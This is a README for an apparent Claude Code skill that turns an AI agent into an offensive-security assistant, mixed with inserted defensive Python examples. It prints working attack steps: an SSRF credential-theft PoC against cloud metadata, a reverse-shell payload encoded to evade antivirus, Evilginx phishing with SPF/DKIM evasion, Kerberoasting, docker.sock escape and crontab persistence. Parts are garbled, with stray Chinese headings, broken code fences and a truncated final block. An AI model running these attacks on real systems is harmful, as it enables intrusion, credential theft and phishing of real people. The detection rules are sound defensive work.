# pentest-ai-agents

Skill by ara.so — Security Skills collection.

pentest-ai-agents transforms Claude Code into an offensive security research assistant through 35 specialized subagents. Each agent carries deep domain knowledge in specific areas: recon, web testing, Active Directory, cloud security, mobile/wireless pentesting, social engineering, payload crafting, reverse engineering, exploit chaining, detection engineering, and forensics.

The agents route automatically based on task description—no manual agent selection needed. They understand 80+ offensive security tools (nmap, nuclei, BloodHound, Impacket, Sliver, Ghidra, etc.) and can plan engagements, analyze recon data, research exploits, chain attacks, build detections, and write reports.

## Installation

### Quick Install (Recommended)

```bash
curl -fsSL https://raw.githubusercontent.com/0xSteph/pentest-ai-agents/main/install.sh | bash
```

This copies agent files to `~/.claude/agents/` and is idempotent (safe to re-run for updates). If you want to read `install.sh` before it runs, use the manual clone below.

### Manual Clone and Install

```bash
git clone https://github.com/0xSteph/pentest-ai-agents.git
cd pentest-ai-agents

# Install agents globally for all projects
./install.sh --global

# Or install for current project only
./install.sh --project

# Use Haiku for advisory agents (lower cost)
./install.sh --global --lite

# Also install underlying CLI tools (nmap, nuclei, ffuf, etc.)
./install.sh --tools
```

The `--tools` flag installs underlying offensive security tools via apt/brew/pacman + pipx/go/cargo.

### Installation Modes

| Flag | Behavior |
|------|----------|
| `--global` | Install to `~/.claude/agents/` (all projects) |
| `--project` | Install to `.claude/agents/` (current project) |
| `--lite` | Use Haiku for Tier 1 advisory agents (cost optimization) |
| `--tools` | Install underlying tools (nmap, nuclei, BloodHound, etc.) |

## Agent Architecture

### Tier 1 vs Tier 2

- **Tier 1 (Advisory)**: Analyze data, plan engagements, recommend commands. Never execute tools directly. Examples: engagement-planner, exploit-guide, detection-engineer.
- **Tier 2 (Execution-capable)**: Can run tools with user approval and declared scope. Examples: recon-advisor, web-hunter, ad-attacker, payload-crafter.

All Tier 2 agents enforce scope guards—they require explicit engagement scope declaration and refuse out-of-scope actions.

### Agent Categories

Planning & OSINT:
  - engagement-planner: Phased pentest plans with MITRE ATT&CK mappings
  - threat-modeler: STRIDE/DREAD threat modeling
  - opsec-anonymizer: Operator identity hygiene, source IP design
  - osint-collector: Domain recon, email harvesting, social profiling
  - recon-advisor: Parses nmap/nuclei/BloodHound, prioritizes targets

Vulnerability Discovery:
  - vuln-scanner: nuclei, nikto, nmap NSE, RouterSploit orchestration
  - web-hunter: ffuf, gobuster, sqlmap, dalfox, Commix
  - api-security: API testing (GraphQL, REST, gRPC)
  - bizlogic-hunter: Business logic flaws, race conditions, IDOR
  - bug-bounty: Bug bounty workflow optimization
  - llm-redteam: OWASP LLM Top 10, prompt injection, RAG poisoning

Infrastructure Attacks:
  - ad-attacker: BloodHound, Impacket, NetExec, Certipy, Kerberos abuse
  - cloud-security: AWS/Azure/GCP misconfig, SCPs, IAM abuse
  - cicd-redteam: Pipeline exploitation, artifact poisoning
  - container-breakout: Docker/K8s escape, runc/cri-o CVEs, RBAC abuse

Specialized Domains:
  - mobile-pentester: Frida, Objection, jadx, MobSF
  - wireless-pentester: aircrack-ng, hcxtools, bettercap
  - social-engineer: Social engineering campaigns
  - phishing-operator: GoPhish, Evilginx, dnstwist

Post-Exploitation:
  - privesc-advisor: Linux/Windows privilege escalation
  - c2-operator: Sliver/Mythic/Havoc/Cobalt Strike profiles
  - payload-crafter: msfvenom, Donut, custom loaders
  - swarm-orchestrator: Multi-agent attack coordination

Analysis & Reverse Engineering:
  - reverse-engineer: Ghidra, Radare2, Binwalk, dnSpy
  - malware-analyst: Volatility 3, YARA, sandbox analysis
  - forensics-analyst: Incident response, memory/disk analysis
  - ctf-solver: CTF challenge solver (crypto, stego, pwn, web)

Exploit Development:
  - exploit-chainer: Multi-step attack composition
  - attack-planner: Attack graph generation, path optimization
  - poc-validator: Exploit proof-of-concept validation
  - credential-tester: Hydra, Hashcat, credential stuffing

Defense & Reporting:
  - detection-engineer: Sigma, Splunk SPL, Elastic KQL, Sentinel KQL
  - stig-analyst: DISA STIG compliance auditing
  - report-generator: Executive summaries, technical findings, CVSS scoring

## Core Commands

### Interactive Routing

Once installed, just describe your task in Claude Code:

- "Plan an internal pentest for a 500-endpoint AD environment, 2-week window."
- "I have a domain user, where do I look first in BloodHound?"
- "Convert this SharpHound EXE into shellcode for an EDR test."
- "Run a phishing simulation against acme-corp.com."
- "Reverse this firmware image and analyze the crypto protocol."

Claude routes to the appropriate specialist automatically.

### Slash Commands

```bash
# Get agent recommendation + concrete next commands
/recommend "phish a small SaaS team's IT department"

# Filter agents by domain
/agents-for web
/agents-for cloud
/agents-for active-directory

# List all agents
/agents
```

### Tool Audit

Check which underlying tools are installed:

```bash
# Audit all tools grouped by agent
bash db/doctor.sh

# Audit specific agent's toolchain
bash db/doctor.sh --agent ad-attacker

# Machine-readable output
bash db/doctor.sh --json
```

Output shows `✔` (installed) or `✘` (missing) per tool with install hints.

### Findings Database

Track engagement findings in persistent SQLite:

```bash
# Initialize new engagement
bash findings.sh init acme-corp-2026

# Add a finding (auto-routed from agent output)
bash findings.sh add --severity critical --title "Domain Admin in Kerberoastable SPN" \
  --description "SVC_SQL account has adminCount=1 and servicePrincipalName set" \
  --cve CVE-2022-12345 --cvss 8.8 --host dc01.acme.local --tool bloodhound

# Show engagement stats
bash findings.sh stats

# Export findings as JSON
bash findings.sh export

# Export as Markdown report
bash findings.sh export --format md
```

Schema includes `cve`, `tool_used`, `mitre_attack`, `remediation` columns.

### Session Handoffs

Generate handoff reports between work sessions:

```bash
bash handoff.sh
```

Produces Markdown with: what was accomplished, current state, immediate next actions, blockers.

## Configuration

### Environment Variables

```bash
# Anthropic API key (required)
export ANTHROPIC_API_KEY="sk-ant-..."

# Optional: Model overrides
export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022"   # Advisory agents
export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219"  # Execution agents

# Optional: Findings database path
export PENTEST_FINDINGS_DB="$HOME/.pentest/findings.db"

# Optional: Tool installation preferences
export PENTEST_PACKAGE_MANAGER="apt"  # apt, brew, pacman, yum
```

### Scope Declaration (Tier 2 Agents)

Tier 2 agents require explicit scope before executing tools:

```bash
# In Claude Code, declare scope first:
"Engagement scope: 10.10.10.0/24, acme-corp.com, authorized by Jane Doe jane@acme.com, 2026-05-01 to 2026-05-15"

# Then request actions:
"Run full port scan on 10.10.10.0/24"
"Enumerate SMB shares on discovered hosts"
```

Agents refuse actions outside declared IP ranges, domains, and time windows.
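
The scope guard described above, as an added example that is not part of pentest-ai-agents: it parses a declaration in the README's free-text format and refuses any target outside the declared ranges, domains or time window. The field layout (comma-separated ranges and domains, `authorized by ...`, `YYYY-MM-DD to YYYY-MM-DD`) is an assumption modelled on the page's two example strings.

```python
import ipaddress
import re
from datetime import date, datetime

# Constructed declaration in the README's free-text style.
SCOPE_TEXT = ("Engagement scope: 10.10.10.0/24, acme-corp.com, "
              "authorized by Jane Doe jane@acme.com, 2026-05-01 to 2026-05-15")

_WINDOW_RE = re.compile(r"(\d{4}-\d{2}-\d{2}) to (\d{4}-\d{2}-\d{2})")
_AUTH_RE = re.compile(r"authorized by ([^,]+)")
_DOMAIN_RE = re.compile(r"[a-z0-9-]+(\.[a-z0-9-]+)+")


def parse_scope(text):
    """Split a declaration into networks, domains, authorizer and date window.
    A declaration with no authorizer or no window is rejected outright: those
    are the fields the page says every scope must carry."""
    _, _, body = text.partition(":")
    networks, domains = [], []
    for token in (t.strip().lower() for t in body.split(",")):
        try:
            networks.append(ipaddress.ip_network(token, strict=False))
            continue
        except ValueError:
            pass
        if _DOMAIN_RE.fullmatch(token):
            domains.append(token)
    window, auth = _WINDOW_RE.search(text), _AUTH_RE.search(text)
    if not (networks or domains):
        raise ValueError("scope names no IP ranges or domains")
    if not (window and auth):
        raise ValueError("scope must name an authorizer and a date window")
    return {"networks": networks, "domains": domains,
            "authorizer": auth.group(1).strip(),
            "start": date.fromisoformat(window.group(1)),
            "end": date.fromisoformat(window.group(2))}


def check_target(scope, target, when):
    """Decide for one IP, CIDR range or hostname whether it may be touched at
    `when` (datetime or ISO 8601 string). Returns (allowed, reason) so a
    refusal can be echoed back to the operator verbatim."""
    if isinstance(when, str):
        when = datetime.fromisoformat(when)
    if not scope["start"] <= when.date() <= scope["end"]:
        return False, f"outside window {scope['start']} to {scope['end']}"
    try:
        net = ipaddress.ip_network(target, strict=False)
    except ValueError:
        net = None  # not an address or range: treat as a hostname
    if net is not None:
        for declared in scope["networks"]:
            if declared.version == net.version and net.subnet_of(declared):
                return True, f"{target} within declared range {declared}"
        return False, f"{target} not within declared IP ranges"
    host = target.lower().rstrip(".")
    for domain in scope["domains"]:
        # Exact match or a real subdomain; "acme-corp.com.evil.example" fails.
        if host == domain or host.endswith("." + domain):
            return True, f"{target} under declared domain {domain}"
    return False, f"{target} not under declared domains"


def guard(scope, targets, when):
    """Gate one requested action on all of its targets. A single out-of-scope
    target refuses the whole action (fail closed) and lists every reason."""
    refused = []
    for target in targets:
        allowed, reason = check_target(scope, target, when)
        if not allowed:
            refused.append(reason)
    return not refused, refused
```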

### Hard Refusal List

All agents enforce scope guards that refuse:
- Denial of Service (DoS/DDoS)
- Mass internet scanning
- Unattended worm/ransomware propagation
- False-flag operations
- Safety-of-life system targeting (medical, industrial control)

## Usage Patterns

### Engagement Planning

```bash
# In Claude Code:
"Plan a 2-week external pentest for fintech-startup.io. Assume no prior credentials. Focus on web app, API, and cloud infrastructure."
```

**engagement-planner** produces:
- Phased timeline (recon → initial access → privilege escalation → lateral movement → exfil simulation)
- MITRE ATT&CK technique mappings per phase
- Tool recommendations with time estimates
- ROE template with emergency contacts

### Recon and Target Prioritization

```bash
# Run recon tools (outside Claude):
nmap -sV -sC -oA acme-scan 10.10.10.0/24
nuclei -l hosts.txt -severity critical,high -json -o nuclei.json

# In Claude Code:
"Analyze acme-scan.xml and nuclei.json. Prioritize targets for initial access."
```

**recon-advisor** (Tier 2):
1. Parses XML/JSON
2. Groups findings by host and severity
3. Recommends attack paths (e.g., "10.10.10.50: outdated Apache + ProxyShell CVE")
4. Suggests next commands: `ffuf -u http://10.10.10.50/FUZZ -w /usr/share/wordlists/dirb/common.txt`

### Active Directory Attack Chains

```bash
# After obtaining BloodHound JSON:
"I have domain user alice@acme.local. BloodHound data is in ./bloodhound/. Show me paths to Domain Admins and recommend attacks."
```

**ad-attacker**:
- Runs `bloodhound-python` or parses existing JSON
- Identifies: Kerberoastable accounts, AS-REP roastable users, constrained delegation, ACL abuse paths
- Generates command sequences:
  ```bash
  GetUserSPNs.py acme.local/alice:password -dc-ip 10.10.10.5 -request -outputfile spns.txt
  hashcat -m 13100 spns.txt /usr/share/wordlists/rockyou.txt
  ```

### Exploit Chaining

```bash
"I found SSRF in the /admin/debug endpoint and read /etc/passwd. Next steps to get a shell?"
```

**exploit-chainer**:
1. Validates SSRF → file read primitive
2. Recommends: SSRF → internal service enumeration → cloud metadata (if AWS/Azure/GCP)
3. Chains: SSRF to 169.254.169.254 → IAM role credentials → S3 bucket access → RCE via Lambda
4. Provides POC code:
   ```python
   import requests
   url = "https://target.com/admin/debug?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
   roles = requests.get(url).text.split('\n')
   creds = requests.get(f"{url}{roles[0]}").json()
   print(creds['AccessKeyId'], creds['SecretAccessKey'], creds['Token'])
   ```

### Payload Crafting and Evasion

```bash
"Generate a Windows reverse shell payload for 10.10.10.50:443, encode it to evade AV, and convert to shellcode for process injection."
```

**payload-crafter**:

```bash
# Stage 1: Generate payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.50 LPORT=443 -f exe -o payload.exe

# Stage 2: Convert to shellcode with Donut
donut -a 2 -f 1 payload.exe -o payload.bin

# Stage 3: Encode shellcode (XOR + base64)
python3 << 'EOF'
import base64
with open('payload.bin', 'rb') as f:
    sc = f.read()
xor_sc = bytes([b ^ 0xAA for b in sc])
print(base64.b64encode(xor_sc).decode())
EOF

# Stage 4: Inject via process hollowing (C# template provided)
```

Includes AMSI bypass snippets and ETW patching patterns.

### Detection Engineering

```bash
"We just tested Kerberoasting against SVC_SQL. Build Sigma and Splunk detection rules."
```

**detection-engineer**:

```yaml
# Sigma rule (kerberoasting.yml)
title: Kerberoasting TGS Request
status: experimental
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketOptions: '0x40810000'
  filter:
    # Either entry excludes the event: krbtgt requests are TGT renewals and
    # computer accounts (names ending in $) are not Kerberoasting targets,
    # so neither belongs in the selection.
    - ServiceName|endswith: '$'
    - ServiceName|startswith: 'krbtgt'
  condition: selection and not filter
falsepositives:
  - Legitimate service account access
level: medium
tags:
  - attack.credential_access
  - attack.t1558.003
```

```spl
# Splunk SPL
index=windows EventCode=4769 Ticket_Options=0x40810000 NOT Service_Name=*$ NOT Service_Name=krbtgt*
| stats count by src_ip, Account_Name, Service_Name
| where count > 5
```

### Reverse Engineering Firmware

```bash
"Analyze router-firmware.bin and extract the encryption keys."
```

**reverse-engineer**:

```bash
# Extract filesystem
binwalk -e router-firmware.bin

# Identify architecture
file _router-firmware.bin.extracted/squashfs-root/bin/httpd
# Output: ELF 32-bit LSB MIPS

# Load into Ghidra (headless mode)
analyzeHeadless /tmp/ghidra_project router_fw -import _router-firmware.bin.extracted/squashfs-root/bin/httpd -postScript FindCryptoKeys.java

# Search for hardcoded keys
strings -n 16 httpd | grep -E '^[A-Fa-f0-9]{32,}$'
```

Provides Ghidra Python scripts for automated key extraction from common crypto libraries (OpenSSL, mbedTLS).

### Phishing Campaign Setup

```bash
"Set up a phishing campaign for acme-corp.com employees. Clone their SSO login page and capture credentials with session cookies."
```

**phishing-operator**:

```bash
# 1. Register lookalike domain
# Manual: acme-sso.com (or use dnstwist suggestions)
dnstwist acme-corp.com --registered | head -10

# 2. Clone SSO page
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent https://sso.acme-corp.com/login

# 3. Deploy Evilginx
evilginx2 -p ./phishlets
# Configure phishlet for acme-corp SSO (example phishlet config provided)

# 4. Track campaign in GoPhish
# Import targets, attach cloned template, set sending profile
```

Includes SMTP relay setup, domain reputation warming, and email header crafting to evade SPF/DKIM/DMARC.

### CTF Challenges

```bash
"Solve this CTF crypto challenge: ciphertext is 'Xq3mK9...' and we have a PCAP with TLS handshake."
```

**ctf-solver**:
1. Identifies cipher type (frequency analysis suggests substitution)
2. Tries automated solvers: dcode.fr substitution, quipqiup
3. Extracts TLS pre-master secret from PCAP via Wireshark
4. Decrypts TLS stream:
   ```bash
   tshark -r capture.pcap -o tls.keylog_file:sslkeylog.txt -Y http -T fields -e http.file_data
   ```

Covers crypto, steganography (zsteg, steghide), forensics, binary exploitation, web challenges.

## Underlying Tools

Agents drive these tools (installable via `install.sh --tools`):

- **Recon**: nmap, masscan, rustscan, subfinder, amass, httpx, theHarvester, sherlock, holehe, maigret
- **Web**: ffuf, gobuster, feroxbuster, sqlmap, dalfox, Commix, dirsearch, whatweb
- **Vulnerability**: nuclei, nikto, nmap NSE, RouterSploit
- **AD**: BloodHound, Impacket, NetExec, Certipy, kerbrute, Responder
- **Credentials**: Hydra, Hashcat, John, cupp, CeWL, Crunch, hashid, haiti
- **Cloud**: aws-cli, azure-cli, gcloud, Trivy, Prowler, ScoutSuite, Pacu
- **Containers**: kubectl, kube-hunter, peirates, CDK
- **C2**: Sliver, Mythic, Havoc, Cobalt Strike
- **LLM**: Garak, PyRIT, Promptfoo
- **Mobile**: Frida, Objection, jadx, apktool, MobSF
- **Wireless**: aircrack-ng, hcxdumptool, bettercap
- **Social**: GoPhish, Evilginx, dnstwist
- **Payloads**: msfvenom, Donut
- **RE**: Ghidra, Radare2, Binwalk, dnSpy
- **Forensics**: Volatility 3, exiftool, YARA, Wireshark

Run `bash db/doctor.sh` to audit installed tools.

## Token Optimization

### Model Selection

```bash
# Use Haiku for advisory agents (engagement-planner, exploit-guide, detection-engineer)
./install.sh --global --lite

# Or set manually:
export PENTEST_TIER1_MODEL="claude-3-5-haiku-20241022"
export PENTEST_TIER2_MODEL="claude-3-7-sonnet-20250219"
```

**Cost comparison** (per 1M tokens input):
- Haiku: $0.80
- Sonnet: $3.00

Tier 1 agents handle ~80% of interactions (planning, analysis, recommendations). Using Haiku for Tier 1 cuts costs by ~60% with minimal quality impact.

### Context Management

Agents use structured tool output parsing to minimize repeated context:

```bash
# Instead of pasting full nmap XML into chat:
findings.sh import --file acme-scan.xml

# Agent queries SQLite directly:
SELECT host, port, service, version FROM scan_results WHERE severity='critical';
```

Reduces token usage by 10-50× for large scan outputs.

### Local Models (Experimental)

Run agents with local models via Ollama:

```bash
# Install Ollama

# Pull model
ollama pull mixtral:8x7b

# Configure pentest-ai-agents
export PENTEST_LOCAL_MODEL="mixtral:8x7b"
export ANTHROPIC_API_KEY=""  # Disable cloud models
```

**Tested models**:
- `mixtral:8x7b`: Good for Tier 1 advisory agents
- `llama3:70b`: Comparable to Haiku for planning/analysis
- `codellama:34b`: Decent for exploit POC generation

**Limitations**: Local models struggle with complex exploit chaining and detection rule generation. Recommend hybrid mode: local for Tier 1, Claude Sonnet for Tier 2.

## Troubleshooting

### Agent Not Routing

**Symptom**: Claude doesn't invoke the right agent for your task.

**Fix**: Be more explicit in task description:

```bash
# Vague
"Help with Active Directory"

# Specific
"I have a domain user. Analyze BloodHound data and recommend Kerberoasting attacks."
```

Or use slash commands:
```bash
/recommend "domain user to domain admin in AD environment"
```

### Tools Not Found

**Symptom**: Agent recommends command, but tool isn't installed.

**Fix**:

```bash
# Audit missing tools
bash db/doctor.sh

# Install missing tools
./install.sh --tools

# Or install specific tool manually:
sudo apt install nmap
pipx install bloodhound
```

### Scope Refusal

**Symptom**: Tier 2 agent refuses to run commands: "No engagement scope declared."

**Fix**: Declare scope first:

```bash
"Engagement scope: 10.10.10.0/24, testlab.local, authorized by Alice <alice@example.com>, 2026-05-01 to 2026-05-31"
```

Include: IP ranges, domains, authorizing party, time window.

### Findings Database Locked

**Symptom**: `database is locked` error when adding findings.

**Fix**:

```bash
# Close any open findings.sh processes
pkill -f findings.sh

# Or use WAL mode (write-ahead logging):
sqlite3 ~/.pentest/findings.db "PRAGMA journal_mode=WAL;"
```
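
As an added example, not findings.sh itself, a minimal Python findings store covering the Findings Database section and the WAL fix above: it creates a table with the columns the README names (`cve`, `tool_used`, `mitre_attack`, `remediation`), opens it in WAL mode with a busy timeout so a second writer waits instead of failing with `database is locked`, and provides the stats and export operations. The table name, the remaining columns and the second sample finding are assumptions; column names are allowlisted before they reach the SQL string.

```python
import json
import sqlite3
import tempfile
from pathlib import Path

# Columns the README names (cve, tool_used, mitre_attack, remediation) plus the
# fields `findings.sh add` takes; the table name and constraints are assumptions.
SCHEMA = """
CREATE TABLE IF NOT EXISTS findings (
    id           INTEGER PRIMARY KEY,
    engagement   TEXT NOT NULL,
    severity     TEXT NOT NULL
                 CHECK (severity IN ('info', 'low', 'medium', 'high', 'critical')),
    title        TEXT NOT NULL,
    description  TEXT,
    cve          TEXT,
    cvss         REAL CHECK (cvss IS NULL OR cvss BETWEEN 0 AND 10),
    host         TEXT,
    tool_used    TEXT,
    mitre_attack TEXT,
    remediation  TEXT
);
"""
OPTIONAL_COLUMNS = {"description", "cve", "cvss", "host",
                    "tool_used", "mitre_attack", "remediation"}


def open_db(path):
    """Open or create the store. WAL is the README's fix for 'database is
    locked': readers stop blocking the single writer, and busy_timeout makes
    a second writer wait up to 5 s instead of failing immediately."""
    conn = sqlite3.connect(str(path), timeout=5)
    conn.row_factory = sqlite3.Row
    conn.execute("PRAGMA journal_mode=WAL;")
    conn.execute("PRAGMA busy_timeout=5000;")
    conn.executescript(SCHEMA)
    return conn


def add_finding(conn, engagement, severity, title, **fields):
    """Insert one finding. Column names are allowlisted before they are
    interpolated into the statement; values always travel as parameters."""
    unknown = set(fields) - OPTIONAL_COLUMNS
    if unknown:
        raise ValueError(f"unknown finding fields: {sorted(unknown)}")
    cols = ["engagement", "severity", "title", *fields]
    sql = (f"INSERT INTO findings ({', '.join(cols)}) "
           f"VALUES ({', '.join('?' * len(cols))})")
    with conn:  # commit, or roll back if a CHECK constraint rejects the row
        cur = conn.execute(sql, [engagement, severity, title, *fields.values()])
    return cur.lastrowid


def stats(conn, engagement):
    """Finding count per severity, the equivalent of `findings.sh stats`."""
    rows = conn.execute("SELECT severity, COUNT(*) AS n FROM findings "
                        "WHERE engagement = ? GROUP BY severity", (engagement,))
    return {r["severity"]: r["n"] for r in rows}


def export_findings(conn, engagement):
    """All findings for an engagement, highest CVSS first (unscored last),
    as plain dicts ready for json.dumps or a Markdown renderer."""
    rows = conn.execute("SELECT * FROM findings WHERE engagement = ? "
                        "ORDER BY cvss IS NULL, cvss DESC", (engagement,))
    return [dict(r) for r in rows]


def journal_mode(conn):
    return conn.execute("PRAGMA journal_mode;").fetchone()[0]


def demo(engagement="acme-corp-2026"):
    """Constructed walk-through mirroring the README's findings.sh session;
    the first finding is the page's own, the second is made up."""
    conn = open_db(Path(tempfile.mkdtemp()) / "findings.db")
    add_finding(conn, engagement, "critical", "Domain Admin in Kerberoastable SPN",
                description="SVC_SQL account has adminCount=1 and servicePrincipalName set",
                cve="CVE-2022-12345", cvss=8.8, host="dc01.acme.local",
                tool_used="bloodhound", mitre_attack="T1558.003",
                remediation="Move SVC_SQL to a gMSA or long random password; remove admin rights")
    add_finding(conn, engagement, "medium", "SMB signing not required",
                host="fs01.acme.local", tool_used="netexec", cvss=5.3)
    try:
        add_finding(conn, engagement, "low", "bad column", hostname="x")
        rejects_unknown = False
    except ValueError:
        rejects_unknown = True
    exported = export_findings(conn, engagement)
    result = {"journal_mode": journal_mode(conn), "stats": stats(conn, engagement),
              "export": exported, "json": json.dumps(exported, indent=2),
              "rejects_unknown_column": rejects_unknown}
    conn.close()
    return result
```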

### Out-of-Date Agent Knowledge

**Symptom**: Agent recommends deprecated tool or technique.

**Fix**: Update agents:

```bash
cd pentest-ai-agents
git pull
./install.sh --global
```

Agents track tool updates via community feedback. File issues for outdated recommendations.

## Real-World Examples

### Example 1: Full External Pentest Workflow

```bash
# Step 1: Plan engagement
# In Claude Code:
"Plan a 2-week external pentest for acme-corp.com. No credentials. Focus on web, API, cloud."
# engagement-planner produces timeline, ROE, tool list

# Step 2: OSINT recon
"Run OSINT on acme-corp.com. Find subdomains, employee emails, leaked credentials."
# osint-collector executes:
subfinder -d acme-corp.com -o subs.txt
amass enum -d acme-corp.com -o amass.txt
theHarvester -d acme-corp.com -b all -f harvest.json
# Searches breach databases (dehashed, etc.)

# Step 3: Vulnerability scanning
"Scan discovered hosts with nuclei for critical/high severity issues."
# vuln-scanner:
nuclei -l live-hosts.txt -severity critical,high -json -o nuclei.json

# Step 4: Prioritize targets
"Analyze nuclei.json. Which hosts are most likely to give initial access?"
# recon-advisor:
# 1. Parses JSON
# 2. Identifies: SSRF in admin panel, outdated WordPress, exposed Git repo
# 3. Recommends: "Target admin.acme-corp.com/debug (SSRF) for cloud metadata access"

# Step 5: Exploit SSRF
"Exploit SSRF at admin.acme-corp.com/debug to access AWS metadata and pivot to S3."
# exploit-chainer:
# Extracts AWS keys
aws s3 ls --profile stolen-creds
# Finds sensitive data bucket

# Step 6: Build detection
"Build Sigma and Splunk rules to detect SSRF to cloud metadata endpoints."
# detection-engineer:
# Produces Sigma rule + Splunk SPL + AWS CloudTrail query

# Step 7: Report
"Generate executive summary and technical findings report."
# report-generator:
# Outputs Markdown with CVSS scores, remediation steps, attack timeline
```

Example 2: AD Privilege Escalation from User to Domain Admin

案例2:从域用户到域管理员的AD权限提升

bash
undefined
bash
undefined

Starting point: domain user alice@corp.local

起点:域用户alice@corp.local

Step 1: Enumerate AD

"I have alice@corp.local credentials. Enumerate AD and find paths to Domain Admins."

ad-attacker:

bloodhound-python -u alice -p 'Password123' -d corp.local -dc dc01.corp.local -c All --zip

Uploads to BloodHound GUI or parses JSON locally

Step 2: Identify attack path

"Analyze BloodHound data. What's the shortest path to DA?"

ad-attacker:

Finds: alice → MemberOf → IT-Admins → GenericWrite → SVC_SQL → Kerberoastable → DA group

Step 3: Execute attack chain

"Execute the attack chain: GenericWrite to add SPN, Kerberoast SVC_SQL, crack hash."

ad-attacker:

1. Add SPN to SVC_SQL (GenericWrite abuse)

python3 addspn.py -u alice -p 'Password123' -t SVC_SQL -s HTTP/fake.corp.local corp.local/dc01

2. Kerberoast

GetUserSPNs.py corp.local/alice:Password123 -dc-ip dc01.corp.local -request -outputfile tgs.txt

3. Crack

hashcat -m 13100 tgs.txt rockyou.txt

4. Validate DA access

netexec smb dc01.corp.local -u SVC_SQL -p 'CrackedPassword' --shares

Step 4: Build detection

"Build detection rules for GenericWrite SPN modification and Kerberoasting."

detection-engineer:

Sigma rule for Event ID 4742 (user object modified) + SPN change

Splunk correlation for 4742 → 4769 (TGS request) within 5 minutes
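The Step 4 correlation from this walkthrough (a 4742 SPN change followed by a 4769 TGS request for the same account within five minutes), as an added Python example and not the Splunk SPL the detection-engineer agent would emit. The events are constructed and reduced to the fields the logic reads; real Security-log records carry more, and field names follow the Windows event schema.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
RC4_TYPES = {"0x17", "0x18"}  # RC4-HMAC ticket types: the ones worth cracking offline

# Constructed events. In 4742 the ServicePrincipalNames field is "-" unless that
# attribute changed; in 4769 ServiceName is the account that owns the requested SPN.
EVENTS = [
    {"EventID": 4742, "TimeCreated": "2025-03-10T10:00:00", "SubjectUserName": "alice",
     "TargetUserName": "SVC_SQL", "ServicePrincipalNames": "HTTP/fake.corp.local"},
    {"EventID": 4742, "TimeCreated": "2025-03-10T10:00:30", "SubjectUserName": "svc_sync",
     "TargetUserName": "bob", "ServicePrincipalNames": "-"},  # unrelated attribute change
    {"EventID": 4769, "TimeCreated": "2025-03-10T10:02:15", "TargetUserName": "alice@CORP.LOCAL",
     "ServiceName": "SVC_SQL", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TimeCreated": "2025-03-10T10:30:00", "TargetUserName": "carol@CORP.LOCAL",
     "ServiceName": "SVC_SQL", "TicketEncryptionType": "0x12"},  # AES, and outside the window
]

def correlate(events, window=WINDOW):
    """Pair each SPN-changing 4742 with the 4769s for that account inside the window."""
    spn_changes = [e for e in events if e["EventID"] == 4742 and e["ServicePrincipalNames"] != "-"]
    tgs_requests = [e for e in events if e["EventID"] == 4769]
    alerts = []
    for change in spn_changes:
        t0 = datetime.fromisoformat(change["TimeCreated"])
        for req in tgs_requests:
            t1 = datetime.fromisoformat(req["TimeCreated"])
            if req["ServiceName"].lower() != change["TargetUserName"].lower():
                continue
            if not t0 <= t1 <= t0 + window:
                continue
            alerts.append({
                "account": change["TargetUserName"],
                "spn": change["ServicePrincipalNames"],
                "modified_by": change["SubjectUserName"],
                "requested_by": req["TargetUserName"],
                "seconds_between": int((t1 - t0).total_seconds()),
                "rc4": req["TicketEncryptionType"] in RC4_TYPES,  # RC4 right after an SPN add: Kerberoast
            })
    return alerts
```

The `modified_by` field is what turns the alert into a lead: the account that wrote the SPN is the compromised principal, not the service account whose hash was requested.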

Example 3: Container Escape to Host Root

Starting point: Shell inside Docker container

Step 1: Assess container environment

"I have a shell in a Docker container. Assess escape vectors."

container-breakout:

Checks: privileged flag, host PID namespace, mounted /var/run/docker.sock, capabilities

Step 2: Exploit mounted docker.sock

"docker.sock is mounted. Exploit it to escape to host."

container-breakout:

docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash

Now root on host

Step 3: Persistence

"Establish persistence on the host as root."

c2-operator:

Recommends: cron job, systemd service, SSH key injection

echo "* * * * * root /tmp/.update.sh" >> /host/etc/crontab

Step 4: Detection

"Build Falco rule to detect docker.sock abuse from containers."

detection-engineer:

Falco rule for container process accessing /var/run/docker.sock
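The four preconditions the container-breakout agent enumerates in Step 1 (privileged flag, host PID namespace, docker.sock mount, added capabilities), turned into a host-side audit of `docker inspect` output as an added example; it is not code from pentest-ai-agents and complements the Step 4 Falco rule by removing the misconfiguration rather than detecting its use. The inspect records are constructed and trimmed to the fields read, and the remediation strings are the editor's suggestions.

```python
import json

# Capabilities that on their own let a container process reach host resources.
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH", "SYS_RAWIO"}
DOCKER_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock"}

def audit_container(record: dict) -> list[tuple[str, str]]:
    """Return (finding, remediation) pairs for one `docker inspect` record."""
    hc = record.get("HostConfig") or {}
    findings = []
    if hc.get("Privileged"):
        findings.append(("privileged container", "drop --privileged and add only the capabilities the workload needs"))
    if hc.get("PidMode") == "host":
        findings.append(("shares the host PID namespace", "remove --pid=host"))
    # Bind sources appear in HostConfig.Binds (CLI -v) and again in Mounts; dedupe them.
    sources = {b.split(":")[0] for b in hc.get("Binds") or []}
    sources |= {m.get("Source", "") for m in record.get("Mounts") or [] if m.get("Type") == "bind"}
    for src in sorted(sources):
        if src in DOCKER_SOCKETS:
            findings.append((f"docker socket mounted from {src}", "remove the mount, or front the socket with an authorization proxy"))
        elif src == "/":
            findings.append(("host root filesystem mounted", "mount only the paths needed, read-only where possible"))
    caps = {c.removeprefix("CAP_").upper() for c in hc.get("CapAdd") or []}
    for cap in sorted(caps & DANGEROUS_CAPS):
        findings.append((f"added capability {cap}", "remove it from --cap-add unless the workload demonstrably needs it"))
    return findings

def audit(inspect_json: str) -> dict[str, list[tuple[str, str]]]:
    """Map container name -> findings for the whole `docker inspect` output."""
    return {rec["Name"].lstrip("/"): audit_container(rec) for rec in json.loads(inspect_json)}

# Constructed `docker inspect` output, trimmed to the fields the audit reads.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/webapp",
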